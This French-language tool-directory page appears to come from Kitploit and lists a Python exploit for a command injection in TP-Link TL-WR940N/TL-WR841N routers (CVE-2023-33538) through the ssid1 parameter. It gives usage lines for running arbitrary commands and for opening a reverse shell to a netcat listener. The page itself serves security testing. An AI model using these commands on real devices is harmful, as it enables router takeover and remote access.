Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-33538 — Exploit Python pour la vulnérabilité d'injection de commandes TP-Link TL-WR940N/TL-WR841N | Kitploit
Outils/GitHubGitHub/explxx/cve-2023-33538
Sécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité Sans FilTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubexplxx/cve-2023-33538

CVE-2023-33538

Exploit Python pour la vulnérabilité d'injection de commandes TP-Link TL-WR940N/TL-WR841N

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit Python pour la vulnérabilité d'injection de commande TP-Link TL-WR940N/TL-WR841N

Instructions d'utilisation

  1. Vérification de base de la vulnérabilité :

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
    
  2. Exécuter une commande personnalisée :

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
    
  3. Reverse Shell (configurez d'abord un écouteur avec nc -lvnp 4444) :

    root@kitploit:~
    python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
    

Remarques importantes :

  • Ces scripts sont uniquement destinés à des fins éducatives et de test
  • Obtenez toujours une autorisation appropriée avant de tester un système
  • La commande de redémarrage est utilisée par défaut car elle est non destructive et facilement vérifiable
  • Le reverse shell peut ne pas fonctionner sur toutes les versions de firmware car il dépend des binaires disponibles
  • Certaines versions de firmware nécessitent un chemin aléatoire dans l'URL que le script tente de détecter automatiquement

La vulnérabilité existe en raison d'une désinfection incorrecte des entrées dans le paramètre ssid1 du point de terminaison /userRpm/WlanNetworkRpm.htm, permettant une injection de commande via des requêtes spécialement conçues.

Télécharger l’outil